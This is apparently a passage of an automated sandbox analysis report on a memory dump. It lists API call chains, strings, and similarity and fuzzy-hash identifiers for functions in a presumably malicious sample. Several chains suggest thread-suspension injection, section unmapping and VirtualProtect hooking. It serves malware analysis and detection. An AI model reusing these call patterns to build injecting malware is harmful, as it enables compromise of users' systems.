    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
